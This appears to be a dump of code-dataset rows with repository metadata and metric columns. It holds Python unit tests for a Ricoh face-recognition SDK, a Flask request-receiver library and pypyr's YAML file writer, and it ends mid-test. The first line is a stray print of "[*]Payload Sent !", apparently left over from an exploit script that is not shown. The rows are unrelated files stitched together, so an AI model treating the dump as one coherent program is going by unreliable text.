print "[*]Payload Sent !" | 33.54 | 82 | 0.692308 | 351 | 1,677 | 3.301994 | 0.903134 | 0.010354 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.243807 | 0.085271 | 1,677 | 50 | 83 | 33.54 | 0.511734 | 0.157424 | 0 | 0 | 0 | 0.551724 | 0.769559 | 0.716927 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0.034483 | null | null | 0.103448 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7f4ad20cf0297bb388a96b6ac5eb26391bad9dba | 12,648 | py | Python | tests/test_vrs/test_face_collection.py | ricohapi/ricoh-cloud-sdk-python | 740d778c678e6097e3c35478545cbf283276a7ee | [
"MIT"
] | 2 | 2018-08-14T21:01:07.000Z | 2019-12-16T07:21:09.000Z | tests/test_vrs/test_face_collection.py | ricohapi/ricoh-cloud-sdk-python | 740d778c678e6097e3c35478545cbf283276a7ee | [
"MIT"
] | null | null | null | tests/test_vrs/test_face_collection.py | ricohapi/ricoh-cloud-sdk-python | 740d778c678e6097e3c35478545cbf283276a7ee | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2017 Ricoh Co., Ltd. All Rights Reserved.
import os
from unittest import TestCase
import json
import pytest
import mock
from mock import Mock, MagicMock
from requests.exceptions import RequestException
from ricohcloudsdk.vrs import util
from ricohcloudsdk.vrs.client import VisualRecognition
from ricohcloudsdk.exceptions import ClientError
ENDPOINT = 'https://ips.api.ricoh/v1'
def make_headers(c_type):
headers = {
'Authorization': 'Bearer atoken',
'x-api-key': 'apikey',
'Content-Type': c_type
}
return headers
class TestInit(TestCase):
def setUp(self):
self.aclient = Mock()
self.aclient.session = Mock(return_value={'access_token': 'atoken'})
def test_ok(self):
VisualRecognition(self.aclient)
def test_param_err(self):
with pytest.raises(TypeError):
VisualRecognition()
class TestMethodOK(TestCase):
def setUp(self):
self.aclient = Mock()
self.aclient.get_access_token = Mock(return_value='atoken')
self.aclient.get_api_key = Mock(return_value='apikey')
self.aclient.session = Mock(return_value={'access_token': 'atoken'})
self.vrs = VisualRecognition(self.aclient)
self.__create_face_collection_expected = {
'collection_id': '728bee35-fa67-473b-91bf-79f088f46179'
}
self.__list_face_collections_expected = {
'face_collections': [
{
'collection_id': '728bee35-fa67-473b-91bf-79f088f46179'
}
]
}
self.__list_faces_expected = {
'faces': [
{
'face_id': '728bee35-fa67-473b-91bf-79f088f46179'
}
]
}
self.__add_face_expected = {
'face_id': '728bee35-fa67-473b-91bf-79f088f46179',
'location': {
'left': 1085,
'top': 244,
'right': 1307,
'bottom': 466
}
}
self.__compare_face_to_collection_expected = {
'source': {
'location': {
'left': 1085,
'top': 244,
'right': 1307,
'bottom': 466
}
},
'target': {
'collection_id': '80bf2bdc-d3de-491e-9106-0635df0a0a18',
'faces': [
{
'face_id': '80bf2bdc-d3de-491e-9106-0635df0a0a18',
'score': 0.787753701210022,
}
]
}
}
def test_param_err(self):
with pytest.raises(TypeError):
self.vrs.detect_faces()
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_list_collection(self, req):
req.return_value.text = json.dumps(
self.__list_face_collections_expected)
req.return_value.status_code = 200
assert self.__list_face_collections_expected == self.vrs.list_collections()
headers = make_headers('application/json')
req.assert_called_once_with(
'GET', ENDPOINT + '/face_collections', headers=headers)
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_create_collection(self, req):
req.return_value.text = json.dumps(
self.__create_face_collection_expected)
req.return_value.status_code = 201
assert self.__create_face_collection_expected == self.vrs.create_collection()
headers = make_headers('application/json')
req.assert_called_once_with(
'POST', ENDPOINT + '/face_collections', headers=headers)
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_delete_collection(self, req):
req.return_value.text = ''
req.return_value.status_code = 204
assert '' == self.vrs.delete_collection(
'728bee35-fa67-473b-91bf-79f088f46179')
headers = make_headers('application/json')
uri = '/face_collections/728bee35-fa67-473b-91bf-79f088f46179'
req.assert_called_once_with(
'DELETE', ENDPOINT + uri, headers=headers)
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_list_faces(self, req):
req.return_value.text = json.dumps(self.__list_faces_expected)
req.return_value.status_code = 200
assert self.__list_faces_expected == self.vrs.list_faces(
'728bee35-fa67-473b-91bf-79f088f46179')
headers = make_headers('application/json')
uri = '/face_collections/728bee35-fa67-473b-91bf-79f088f46179/faces'
req.assert_called_once_with(
'GET', ENDPOINT + uri, headers=headers)
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_remove_face(self, req):
req.return_value.text = ''
req.return_value.status_code = 204
assert '' == self.vrs.remove_face(
'728bee35-fa67-473b-91bf-79f088f46179', '79a68ab3-8c42-4c79-bc09-3ac363cd9ab1')
headers = make_headers('application/json')
uri = '/face_collections/728bee35-fa67-473b-91bf-79f088f46179/faces/79a68ab3-8c42-4c79-bc09-3ac363cd9ab1'
req.assert_called_once_with(
'DELETE', ENDPOINT + uri, headers=headers)
@mock.patch('ricohcloudsdk.vrs.util.Image.open')
@mock.patch('os.path.isfile')
@mock.patch('ricohcloudsdk.vrs.client.open')
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_add_face_jpeg(self, req, opn, isfile, pil_open):
req.return_value.text = json.dumps(self.__add_face_expected)
req.return_value.status_code = 201
opn.side_effect = mock.mock_open()
opn.read_data = b'readdata'
isfile.return_value = True
img = MagicMock()
img.format.lower.side_effect = ['jpeg']
pil_open.return_value = img
assert self.__add_face_expected == self.vrs.add_face(
'test.jpg', '728bee35-fa67-473b-91bf-79f088f46179')
headers = {
'Authorization': 'Bearer atoken',
'x-api-key': 'apikey'
}
uri = '/face_collections/728bee35-fa67-473b-91bf-79f088f46179/faces'
payload = {
'image': opn()
}
req.assert_called_once_with(
'POST', ENDPOINT + uri, headers=headers, files=payload)
@mock.patch('ricohcloudsdk.vrs.util.Image.open')
@mock.patch('os.path.isfile')
@mock.patch('ricohcloudsdk.vrs.client.open')
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_add_face_png(self, req, opn, isfile, pil_open):
req.return_value.text = json.dumps(self.__add_face_expected)
req.return_value.status_code = 201
opn.side_effect = mock.mock_open()
opn.read_data = b'readdata'
isfile.return_value = True
img = MagicMock()
img.format.lower.side_effect = ['png']
pil_open.return_value = img
assert self.__add_face_expected == self.vrs.add_face(
'test.png', '728bee35-fa67-473b-91bf-79f088f46179')
headers = {
'Authorization': 'Bearer atoken',
'x-api-key': 'apikey'
}
uri = '/face_collections/728bee35-fa67-473b-91bf-79f088f46179/faces'
payload = {
'image': opn()
}
req.assert_called_once_with(
'POST', ENDPOINT + uri, headers=headers, files=payload)
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_add_face_uri(self, req):
req.return_value.text = json.dumps(self.__add_face_expected)
req.return_value.status_code = 200
assert self.__add_face_expected == self.vrs.add_face(
'http://test.com/test.jpg', '728bee35-fa67-473b-91bf-79f088f46179')
headers = make_headers('application/json')
payload = json.dumps({'image': 'http://test.com/test.jpg'})
uri = '/face_collections/728bee35-fa67-473b-91bf-79f088f46179/faces'
req.assert_called_once_with(
'POST', ENDPOINT + uri, headers=headers, data=payload)
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_compare_faces_uri_to_collection(self, req):
req.return_value.text = json.dumps(
self.__compare_face_to_collection_expected)
req.return_value.status_code = 200
assert self.__compare_face_to_collection_expected == self.vrs.compare_faces(
'http://test.com/test_1.jpg', '728bee35-fa67-473b-91bf-79f088f46179')
headers = make_headers('application/json')
payload = json.dumps(
{
'image': 'http://test.com/test_1.jpg'
}
)
uri = '/compare_faces/728bee35-fa67-473b-91bf-79f088f46179'
req.assert_called_once_with(
'POST', ENDPOINT + uri, headers=headers, data=payload)
@mock.patch('ricohcloudsdk.vrs.util.Image.open')
@mock.patch('os.path.isfile')
@mock.patch('ricohcloudsdk.vrs.client.open')
@mock.patch('ricohcloudsdk.vrs.util.SESSION.request')
def test_compare_faces_image_to_collection(self, req, opn, isfile, pil_open):
req.return_value.text = json.dumps(
self.__compare_face_to_collection_expected)
req.return_value.status_code = 200
isfile.side_effect = [True, False]
img = MagicMock()
img.format.lower.side_effect = ['jpeg']
pil_open.return_value = img
opn.side_effect = mock.mock_open()
opn.read_data = b'readdata'
assert self.__compare_face_to_collection_expected == self.vrs.compare_faces(
'test_1.jpg', '728bee35-fa67-473b-91bf-79f088f46179')
headers = {
'Authorization': 'Bearer atoken',
'x-api-key': 'apikey'
}
payload = {
'image': opn()
}
uri = '/compare_faces/728bee35-fa67-473b-91bf-79f088f46179'
req.assert_called_once_with(
'POST', ENDPOINT + uri, headers=headers, files=payload)
class TestMethodError(TestCase):
def setUp(self):
self.aclient = Mock()
self.aclient.get_access_token = Mock(return_value='atoken')
self.aclient.get_api_key = Mock(return_value='apikey')
self.aclient.session = Mock(return_value={'access_token': 'atoken'})
self.vrs = VisualRecognition(self.aclient)
def test_add_face_file_not_found(self):
with pytest.raises(ValueError) as excinfo:
self.vrs.add_face('collection_id', 'image.jpg')
assert util.RESOURCE_ERROR == str(excinfo.value)
def test_add_face_file_not_found(self):
with pytest.raises(ValueError) as excinfo:
self.vrs.add_face('collection_id', 'image.jpg')
assert util.RESOURCE_ERROR == str(excinfo.value)
@mock.patch('ricohcloudsdk.vrs.util.Image.open')
@mock.patch('os.path.isfile')
@mock.patch('ricohcloudsdk.vrs.client.open')
def test_compare_faces_uuid_jpeg(self, opn, isfile, pil_open):
opn.side_effect = mock.mock_open()
opn.read_data = b'readdata'
isfile.side_effect = [False, True]
img = MagicMock()
img.format.lower.return_value = 'jpeg'
pil_open.return_value = img
with pytest.raises(ValueError) as excinfo:
self.vrs.compare_faces(
'ef0dce93-c2ac-4da5-bb2c-82ca7c770ad8', 'test_1.jpeg'
)
assert util.COMBINATION_ERROR == str(excinfo.value)
@mock.patch('ricohcloudsdk.vrs.util.Image.open')
@mock.patch('os.path.isfile')
@mock.patch('ricohcloudsdk.vrs.client.open')
def test_compare_faces_uuid_uri(self, opn, isfile, pil_open):
opn.side_effect = mock.mock_open()
opn.read_data = b'readdata'
isfile.side_effect = [False, False]
with pytest.raises(ValueError) as excinfo:
self.vrs.compare_faces(
'ef0dce93-c2ac-4da5-bb2c-82ca7c770ad8', 'https://test.co,/test.jpg'
)
assert util.COMBINATION_ERROR == str(excinfo.value)
@mock.patch('ricohcloudsdk.vrs.util.Image.open')
@mock.patch('os.path.isfile')
@mock.patch('ricohcloudsdk.vrs.client.open')
def test_compare_faces_uuid_uuid(self, opn, isfile, pil_open):
opn.side_effect = mock.mock_open()
opn.read_data = b'readdata'
isfile.side_effect = [False, False]
with pytest.raises(ValueError) as excinfo:
self.vrs.compare_faces(
'ef0dce93-c2ac-4da5-bb2c-82ca7c770ad8', '06ef969b-4d2f-49bf-8f79-afc3bc072def'
)
assert util.COMBINATION_ERROR == str(excinfo.value)
| 39.401869 | 113 | 0.626028 | 1,451 | 12,648 | 5.229497 | 0.11785 | 0.049288 | 0.063785 | 0.072483 | 0.884686 | 0.848708 | 0.82525 | 0.800738 | 0.79428 | 0.739457 | 0 | 0.069726 | 0.253874 | 12,648 | 320 | 114 | 39.525 | 0.734344 | 0.006088 | 0 | 0.623693 | 0 | 0.003484 | 0.232973 | 0.153485 | 0 | 0 | 0 | 0 | 0.087108 | 1 | 0.076655 | false | 0 | 0.034843 | 0 | 0.125436 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7f93ff5fc839b3e7aa65627c16a4233fd66b4dae | 14,253 | py | Python | test_app/test.py | OmarThinks/MoRG | fecf78e15453b0efa9223cd5196fea8176cdfdf3 | [
"MIT"
] | null | null | null | test_app/test.py | OmarThinks/MoRG | fecf78e15453b0efa9223cd5196fea8176cdfdf3 | [
"MIT"
] | null | null | null | test_app/test.py | OmarThinks/MoRG | fecf78e15453b0efa9223cd5196fea8176cdfdf3 | [
"MIT"
] | null | null | null | import os
import secrets
import unittest
import json
import random
from flask import Flask, request, abort, jsonify
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import func
from flask_cors import CORS
from flask_migrate import Migrate
import base64
from app import create_app
"""
b:validation Functions
"""
unittest.TestLoader.sortTestMethodsUsing = None
class receiver_TestCase(unittest.TestCase):
"""This class represents the trivia test case"""
def setUp(self):
# create and configure the app
self.app = create_app() #Flask(__name__)
self.client = self.app.test_client
#db.app = self.app
#db.init_app(self.app)
#db.create_all()
def tearDown(self):
"""Executed after reach test"""
print("_+++++++++++++++++++++++++++++++++_")
#Note: Tests are run alphapetically
def test_00000_test(self):
self.assertEqual(1,1)
print("Test 0:Hello, Tests!")
def test_a_0_0_0(self):
print("Testing json_receiver")
def test_a_1_1_1_json_receiver_tests(self):
#Testing the function of route "json_receiver_test/int"
response = self.client().post("/json_receiver/1")
#Expected to fail, No request body
data = json.loads(response.data)
#print(data)
self.assertEqual(data,{'message': "MoRBs:json_"+
"json_receiver:ERROR: 'request' is supposed to "+
"have the type of 'LocalProxy', but found "+
"type of '<class 'int'>' instead"})
self.assertEqual(response.status_code,200)
print("Test a_1_1_1: json_receiver_tests : request not flask_request")
def test_a_1_2_1_json_receiver_tests(self):
#Testing the function of route "json_receiver_test/int"
response = self.client().post("/json_receiver/2")
#Expected to fail, No request body
data = json.loads(response.data)
#print(data)
self.assertEqual(data,{'message': "MoRBs:"+
"json_receiver:ERROR: 'saModel' is supposed"+
" to have the type of 'DeclarativeMeta', but"+
" found type of '<class 'int'>' instead"})
self.assertEqual(response.status_code,200)
print("Test a_1_2_1: json_receiver_tests : Not saModel")
def test_a_1_3_1_json_receiver_tests(self):
#Testing the function of route "json_receiver_test/int"
response = self.client().post("/json_receiver/3")
#Expected to fail, No request body
data = json.loads(response.data)
#print(data)
self.assertEqual(data,{'message': "MoRBs:"+
"json_receiver:ERROR: 'element in neglect"+
" list' is supposed to have the type of 'str'"+
", but found type of '<class 'int'>' instead"})
self.assertEqual(response.status_code,200)
print("Test a_1_3_1: json_receiver_tests : neglect fails")
def test_a_1_4_1_json_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/json_receiver/4")
#Expected to fail, No request body
data = json.loads(response.data)
#print(data)
self.assertEqual(data,{'message': "MoRBs:"+
"json_receiver:ERROR: 'element in extra "+
"list' is supposed to have the type of 'str'"+
", but found type of '<class 'int'>' instead"})
self.assertEqual(response.status_code,200)
print("Test a_1_4_1: json_receiver_tests : extra fails")
def test_a_1_5_1_json_receiver_tests(self):
#Testing the function of route "json_receiver_test/int"
response = self.client().post("/json_receiver/5")
#Expected to fail, No request body
data = json.loads(response.data)
#print(data)
self.assertEqual(data,{'result': {
'description': 'there is no request body',
'status': 400}, 'success': False})
self.assertEqual(response.status_code,200)
print("Test a_1_5_1: json_receiver_tests : neglect fails,"+
" a field not in saModel")
def test_a_1_5_2_json_receiver_tests(self):
#Testing the function of route "json_receiver_test/int"
response = self.client().post("/json_receiver/5",json={})
#Expected to fail, No request body
data = json.loads(response.data)
print(data)
self.assertEqual(data,{'result': {
'description': 'there is no request body',
'status': 400}, 'success': False})
self.assertEqual(response.status_code,200)
print("Test a_1_5_2: json_receiver_tests : neglect fails,"+
" a field not in saModel")
"""def test_c_1_1_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver/1")
#Expected to fail, No request body
data = json.loads(response.data)
self.assertEqual(data,{'description':
'there is no request body', 'error': 400, 'message': 'bad request',
'success': False})
self.assertEqual(response.status_code,400)
print("Test c_1_1_1: receiver_tests : no request body")
def test_c_1_1_2_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/1",json={})
#Expected to Succeed, Error in the server
data = json.loads(response.data)
self.assertEqual(data,{"success":True,"result":
{'in_stock': None, 'name': None, 'price': None}})
self.assertEqual(response.status_code,200)
print("Test c_1_1_2: receiver_tests : request body successful, empty")
def test_c_1_1_3_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/1",json=
{'in_stock': True, 'name': "abc", 'price': 5})
#Expected to succeed,
data = json.loads(response.data)
self.assertEqual(response.status_code,200)
self.assertEqual(data,{"success":True,"result":
{'in_stock': True, 'name': "abc", 'price': 5}})
print("Test c_1_1_3: receiver_tests : request body"+
" successful, full request body")
def test_c_1_2_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/2",json=
{'in_stock': True, 'name': "abc", 'price': 5})
#Expected to succeed, empty response
data = json.loads(response.data)
self.assertEqual(response.status_code,200)
self.assertEqual(data,{"success":True,"result":{}})
print("Test c_1_2_1: receiver_tests : request body"+
" successful, full request body")
def test_c_1_2_2_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/2")
#Expected to succeed, empty response
data = json.loads(response.data)
self.assertEqual(response.status_code,200)
self.assertEqual(data,{"success":True,"result":{}})
print("Test c_1_2_2: receiver_tests : request body"+
" successful, empty request body")
def test_c_1_3_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/3")
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,500)
self.assertEqual(data,{'description': "MoRBs:receiver:ERROR: "+
"'request' is supposed to have the type of "+
"'flask.request', but found type of '<class 'int'>' instead",
'error': 500, 'message': 'internal server error', 'success': False})
print("Test c_1_3_1: wrong request type")
def test_c_1_3_2_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/3",json={"price":5})
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,500)
self.assertEqual(data,{'description': "MoRBs:receiver:ERROR: "+
"'request' is supposed to have the type of 'flask.request'"+
", but found type of '<class 'int'>' instead",
'error': 500, 'message': 'internal server error', 'success': False})
print("Test c_1_3_2: wrong request type")
def test_c_1_4_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/3")
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,500)
self.assertEqual(data,{'description': "MoRBs:receiver:ERROR: 'request' "+
"is supposed to have the type of 'flask.request', but found type of "+
"'<class 'int'>' instead", 'error': 500, 'message':
'internal server error', 'success': False})
print("Test c_1_4_1: wrong request type")
def test_c_1_4_2_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/3",json={"price":5})
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,500)
self.assertEqual(data,{'description': "MoRBs:receiver:ERROR: "+
"'request' is supposed to have the type of 'flask.request'"+
", but found type of '<class 'int'>' instead", 'error': 500,
'message': 'internal server error', 'success': False})
print("Test c_1_4_2: wrong request type")
def test_c_1_5_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/5")
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,500)
self.assertEqual(data,{'description': "MoRBs:validate_expected:ERROR: "+
"'expected' is supposed to have the type of 'dict', but found "+
"type of '<class 'str'>' instead", 'error': 500,
'message': 'internal server error', 'success': False})
print("Test c_1_5_1: wrong inputs type")
def test_c_1_6_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/6")
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,500)
self.assertEqual(data,{'description': "MoRBs:validate_expected:ERROR: "+
"'expected' is supposed to have the type of 'dict', but found type "+
"of '<class 'list'>' instead", 'error': 500,
'message': 'internal server error', 'success': False})
print("Test c_1_6_1: wrong type in inputs")
def test_c_1_7_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/7")
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,500)
self.assertEqual(data,{'description': "MoRBs:validate_expected:ERROR: "+
"'expected' is supposed to have the type of 'dict', but found "+
"type of '<class 'list'>' instead", 'error': 500,
'message': 'internal server error', 'success': False})
print("Test c_1_7_1: wrong type in inputs")
def test_c_1_8_1_receiver_tests(self):
#Testing the function of route "receiver_test/int"
response = self.client().post("/receiver_test/8")
#Expected to fail, request has wrong value
data = json.loads(response.data)
self.assertEqual(response.status_code,200)
self.assertEqual(data,{"result":{}, 'success': True})
print("Test c_1_8_1: wrong type in inputs")
def test_c_2_1_attendance_validator(self):
# Perfect no old
self.assertEqual(attendance_validator(expected=
{"name":"string","price":"integer","in_stock":"boolean"}
,received={"success":True,
"result":{"name":"abc","price":5,"in_stock":True}}),
{"success":True,"result":{"name":"abc","price":5,"in_stock":True}})
# Perfect empty no old
self.assertEqual(attendance_validator(expected={}
,received={"success":True,
"result":{"name":"abc","price":5,"in_stock":True}}),
{"success":True,"result":{}})
print("Test c_2_1: attendance_validator")
def test_c_2_2_attendance_validator(self):
# perfect with old
self.assertEqual(attendance_validator(expected=
{"name":"string","price":"integer","in_stock":"boolean"}
,received={"success":True,
"result":{"name":"abc","price":5,"in_stock":True}},
old={"name":"efg","price":9,"in_stock":False}),
{"success":True,"result":{"name":"abc","price":5,"in_stock":True}})
# missing values with old
self.assertEqual(attendance_validator(expected=
{"name":"string","price":"integer","in_stock":"boolean"}
,received={"success":True,
"result":{"name":None,"price":None,"in_stock":True,"data":False}},
old={"name":"efg","price":9,"in_stock":False,"rty":"741"}),
{"success":True,"result":{"name":"efg","price":9,"in_stock":True}})
# empty with old
self.assertEqual(attendance_validator(expected=
{}
,received={"success":True,
"result":{"name":None,"price":None,"in_stock":True}},
old={"name":"efg","price":9,"in_stock":False}),
{"success":True,"result":{}})
print("Test c_2_2: attendance_validator")
def test_c_2_3_attendance_validator(self):
# new missing value
self.assertEqual(attendance_validator(expected=
{"name":"string","price":"integer","in_stock":"boolean"}
,received={"success":True,
"result":{"name":None,"price":5,"in_stock":True}}),
{"success":False,"result":{"status":400,"description":
"name is missing"}})
# old missing all
self.assertEqual(attendance_validator(expected=
{"name":"string","price":"integer","in_stock":"boolean"}
,received={"success":True,
"result":{"name":None,"price":None,"in_stock":None}},
old={"name":"efg","price":9,"in_stock":False}),
{"success":False,"result":{"status":400,"description":
"you must at least enter one field to change"}})
print("Test c_2_3: attendance_validator")
def test_c_2_4_attendance_validator(self):
# failing checkpoint
try:
attendance_validator(expected=
{"name":"string","price":"integer","in_stock":"boolean"}
,received={"success":1,
"result":{"name":"abc","price":5,"in_stock":True}},
old={"name":"efg","price":9,"in_stock":False})
except Exception as e:
self.assertEqual(str(e),"MoRBs:attendance_validator:ERROR: 'received['success']' is supposed to have the type of 'bool', but found type of '<class 'int'>' instead")
# recieved not dict
try:
attendance_validator(expected=
{"name":"string","price":"integer","in_stock":"boolean"}
,received="abc",
old={"name":"efg","price":9,"in_stock":False})
except Exception as e:
self.assertEqual(str(e),"MoRBs:attendance_validator:ERROR: 'received' is supposed to have the type of 'dict', but found type of '<class 'str'>' instead")
print("Test c_2_4: attendance_validator")"""
# Make the tests conveniently executable
if __name__ == "__main__":
unittest.main() | 35.6325 | 167 | 0.705045 | 2,043 | 14,253 | 4.740088 | 0.081743 | 0.074349 | 0.016109 | 0.047088 | 0.879182 | 0.872573 | 0.83354 | 0.802354 | 0.759397 | 0.748967 | 0 | 0.022572 | 0.135901 | 14,253 | 400 | 168 | 35.6325 | 0.763722 | 0.057462 | 0 | 0.333333 | 0 | 0 | 0.350546 | 0.010328 | 0 | 0 | 0 | 0 | 0.160494 | 1 | 0.123457 | false | 0 | 0.148148 | 0 | 0.283951 | 0.123457 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f6cdb35f85f36b2599343914c1816806a46134ab | 19 | py | Python | cases/fractals/__init__.py | vikian050194/svg | 5afc243df1168981b76d92048055e6a0fc90e9dd | [
"MIT"
] | null | null | null | cases/fractals/__init__.py | vikian050194/svg | 5afc243df1168981b76d92048055e6a0fc90e9dd | [
"MIT"
] | null | null | null | cases/fractals/__init__.py | vikian050194/svg | 5afc243df1168981b76d92048055e6a0fc90e9dd | [
"MIT"
] | null | null | null | from .serp import * | 19 | 19 | 0.736842 | 3 | 19 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 19 | 1 | 19 | 19 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f6d6fe3f8a60b65a9deea083ea3ab6ad913c275a | 12,869 | py | Python | tests/unit/pypyr/steps/filewriteyaml_test.py | mofm/pypyr | f417f69ba9a607d8a93019854105cfbc4dc9c36d | [
"Apache-2.0"
] | 1 | 2021-12-30T20:47:18.000Z | 2021-12-30T20:47:18.000Z | tests/unit/pypyr/steps/filewriteyaml_test.py | mofm/pypyr | f417f69ba9a607d8a93019854105cfbc4dc9c36d | [
"Apache-2.0"
] | null | null | null | tests/unit/pypyr/steps/filewriteyaml_test.py | mofm/pypyr | f417f69ba9a607d8a93019854105cfbc4dc9c36d | [
"Apache-2.0"
] | null | null | null | """filewriteyaml.py unit tests."""
import io
from unittest.mock import mock_open, patch
import pytest
from pypyr.context import Context
from pypyr.dsl import Jsonify
from pypyr.errors import (
ContextError,
KeyInContextHasNoValueError,
KeyNotInContextError)
import pypyr.steps.filewriteyaml as filewrite
def test_filewriteyaml_no_filewriteyaml_raises():
"""No input fileWriteYaml raises."""
context = Context({
'k1': 'v1'})
with pytest.raises(KeyNotInContextError) as err_info:
filewrite.run_step(context)
assert str(err_info.value) == (
"context['fileWriteYaml'] doesn't exist. "
"It must exist for pypyr.steps.filewriteyaml.")
def test_filewriteyaml_none_filewriteyaml_raises():
"""None fileWriteYaml raises."""
context = Context({
'k1': 'v1',
'fileWriteYaml': None})
with pytest.raises(KeyInContextHasNoValueError) as err_info:
filewrite.run_step(context)
assert str(err_info.value) == (
"context['fileWriteYaml'] must have a value for "
"pypyr.steps.filewriteyaml.")
def test_filewriteyaml_filewriteyaml_not_iterable_raises():
"""Not iterable fileWriteYaml raises."""
context = Context({
'k1': 'v1',
'fileWriteYaml': 1})
with pytest.raises(ContextError) as err_info:
filewrite.run_step(context)
assert str(err_info.value) == (
"context['fileWriteYaml'] must exist, be iterable "
"and contain 'path' for pypyr.steps.filewriteyaml. argument of type "
"'int' is not iterable")
def test_filewriteyaml_empty_path_raises():
"""Empty path raises."""
context = Context({
'fileWriteYaml': {
'path': None
}})
with pytest.raises(KeyInContextHasNoValueError) as err_info:
filewrite.run_step(context)
assert str(err_info.value) == (
"context['fileWriteYaml']['path'] must have a value for "
"pypyr.steps.filewriteyaml.")
def test_filewriteyaml_no_path_raises():
"""No path raises."""
context = Context({
'fileWriteYaml': 'blah',
'k1': 'v1'})
with pytest.raises(KeyNotInContextError) as err_info:
filewrite.run_step(context)
assert str(err_info.value) == ("context['fileWriteYaml']['path'] "
"doesn't exist. It must exist for "
"pypyr.steps.filewriteyaml.")
@patch('pypyr.steps.filewriteyaml.Path')
def test_filewriteyaml_pass_no_payload(mock_path):
"""Success case writes all context out when no payload."""
context = Context({
'k1': 'v1',
'fileWriteYaml': {
'path': '/arb/blah'
}})
with io.StringIO() as out_text:
with patch('pypyr.steps.filewriteyaml.open',
mock_open()) as mock_output:
mock_output.return_value.write.side_effect = out_text.write
filewrite.run_step(context)
assert context, "context shouldn't be None"
assert len(context) == 2, "context should have 2 items"
assert context['k1'] == 'v1'
assert context['fileWriteYaml'] == {'path': '/arb/blah'}
mock_path.assert_called_once_with('/arb/blah')
mocked_path = mock_path.return_value
mocked_path.parent.mkdir.assert_called_once_with(parents=True,
exist_ok=True)
mock_output.assert_called_once_with(mocked_path, 'w')
# yaml well formed & new lines and indents are where they should be
assert out_text.getvalue() == ('k1: v1\n'
'fileWriteYaml:\n'
' path: /arb/blah\n')
@patch('pypyr.steps.filewriteyaml.Path')
def test_filewriteyaml_pass_with_payload(mock_path):
"""Success case writes only specific context payload."""
context = Context({
'k1': 'v1',
'fileWriteYaml': {
'path': '/arb/blah',
'payload': [
'first',
'second',
{'a': 'b', 'c': 123.45, 'd': [0, 1, 2]},
12,
True
]
}})
with io.StringIO() as out_text:
with patch('pypyr.steps.filewriteyaml.open',
mock_open()) as mock_output:
mock_output.return_value.write.side_effect = out_text.write
filewrite.run_step(context)
assert context, "context shouldn't be None"
assert len(context) == 2, "context should have 2 items"
assert context['k1'] == 'v1'
assert context['fileWriteYaml']['payload'] == [
'first',
'second',
{'a': 'b', 'c': 123.45,
'd': [0, 1, 2]},
12,
True
]
